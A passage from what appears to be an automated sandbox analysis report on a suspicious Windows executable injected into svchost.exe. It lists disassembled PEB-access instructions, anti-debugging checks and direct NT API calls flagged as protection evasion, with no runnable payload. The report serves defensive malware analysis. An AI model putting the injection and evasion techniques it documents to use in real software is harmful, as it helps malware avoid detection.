            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E47A0 mov eax, dword ptr fs:[00000030h]1_2_035E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354C640 mov eax, dword ptr fs:[00000030h]1_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03562674 mov eax, dword ptr fs:[00000030h]1_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]1_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]1_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572619 mov eax, dword ptr fs:[00000030h]1_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE609 mov eax, dword ptr fs:[00000030h]1_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E627 mov eax, dword ptr fs:[00000030h]1_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03566620 mov eax, dword ptr fs:[00000030h]1_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568620 mov eax, dword ptr fs:[00000030h]1_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353262C mov eax, dword ptr fs:[00000030h]1_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov eax, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035666B0 mov eax, dword ptr fs:[00000030h]1_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C6A6 mov eax, dword ptr fs:[00000030h]1_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6500 mov eax, dword ptr fs:[00000030h]1_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035365D0 mov eax, dword ptr fs:[00000030h]1_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035325E0 mov eax, dword ptr fs:[00000030h]1_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E59C mov eax, dword ptr fs:[00000030h]1_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov eax, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov ecx, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564588 mov eax, dword ptr fs:[00000030h]1_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA456 mov eax, dword ptr fs:[00000030h]1_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352645D mov eax, dword ptr fs:[00000030h]1_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355245A mov eax, dword ptr fs:[00000030h]1_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC460 mov ecx, dword ptr fs:[00000030h]1_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C427 mov eax, dword ptr fs:[00000030h]1_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035304E5 mov ecx, dword ptr fs:[00000030h]1_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA49A mov eax, dword ptr fs:[00000030h]1_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035644B0 mov ecx, dword ptr fs:[00000030h]1_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BA4B0 mov eax, dword ptr fs:[00000030h]1_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035364AB mov eax, dword ptr fs:[00000030h]1_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEB50 mov eax, dword ptr fs:[00000030h]1_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB40 mov eax, dword ptr fs:[00000030h]1_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8B42 mov eax, dword ptr fs:[00000030h]1_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352CB7E mov eax, dword ptr fs:[00000030h] | 1_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h] | 1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h] | 1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h] | 1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DEBD0 mov eax, dword ptr fs:[00000030h] | 1_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h] | 1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h] | 1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h] | 1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355EBFC mov eax, dword ptr fs:[00000030h] | 1_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BCBF0 mov eax, dword ptr fs:[00000030h] | 1_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h] | 1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h] | 1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] | 1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h] | 1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h] | 1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h] | 1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DEA60 mov eax, dword ptr fs:[00000030h] | 1_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BCA11 mov eax, dword ptr fs:[00000030h] | 1_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h] | 1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356CA24 mov eax, dword ptr fs:[00000030h] | 1_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355EA2E mov eax, dword ptr fs:[00000030h] | 1_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03530AD0 mov eax, dword ptr fs:[00000030h] | 1_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h] | 1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h] | 1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h] | 1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03568A90 mov edx, dword ptr fs:[00000030h] | 1_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03604A80 mov eax, dword ptr fs:[00000030h] | 1_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h] | 1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03586AA4 mov eax, dword ptr fs:[00000030h] | 1_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0946 mov eax, dword ptr fs:[00000030h] | 1_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h] | 1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BC97C mov eax, dword ptr fs:[00000030h] | 1_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03556962 mov eax, dword ptr fs:[00000030h] | 1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0357096E mov eax, dword ptr fs:[00000030h] | 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0357096E mov edx, dword ptr fs:[00000030h] | 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0357096E mov eax, dword ptr fs:[00000030h] | 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BC912 mov eax, dword ptr fs:[00000030h] | 1_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528918 mov eax, dword ptr fs:[00000030h] | 1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h] | 1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B892A mov eax, dword ptr fs:[00000030h] | 1_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C892B mov eax, dword ptr fs:[00000030h] | 1_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035649D0 mov eax, dword ptr fs:[00000030h] | 1_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035FA9D3 mov eax, dword ptr fs:[00000030h] | 1_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C69C0 mov eax, dword ptr fs:[00000030h] | 1_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h] | 1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE9E0 mov eax, dword ptr fs:[00000030h] | 1_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B89B3 mov esi, dword ptr fs:[00000030h] | 1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h] | 1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] | 1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035309AD mov eax, dword ptr fs:[00000030h] | 1_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03560854 mov eax, dword ptr fs:[00000030h] | 1_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534859 mov eax, dword ptr fs:[00000030h] | 1_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03542840 mov ecx, dword ptr fs:[00000030h] | 1_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h] | 1_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h] | 1_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BC810 mov eax, dword ptr fs:[00000030h] | 1_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03552835 mov eax, dword ptr fs:[00000030h] | 1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03552835 mov ecx, dword ptr fs:[00000030h] | 1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03552835 mov eax, dword ptr fs:[00000030h] | 1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A830 mov eax, dword ptr fs:[00000030h] | 1_2_0356A830
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D483A mov eax, dword ptr fs:[00000030h] | 1_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355E8C0 mov eax, dword ptr fs:[00000030h] | 1_2_0355E8C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036008C0 mov eax, dword ptr fs:[00000030h] | 1_2_036008C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356C8F9 mov eax, dword ptr fs:[00000030h] | 1_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035FA8E4 mov eax, dword ptr fs:[00000030h] | 1_2_035FA8E4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BC89D mov eax, dword ptr fs:[00000030h] | 1_2_035BC89D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03530887 mov eax, dword ptr fs:[00000030h] | 1_2_03530887
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352CF50 mov eax, dword ptr fs:[00000030h] | 1_2_0352CF50
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, | 0_2_004238DA
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter, | 0_2_0041F250
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_0041A208
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe | NtSetInformationThread: Direct from: 0x76EF63F9
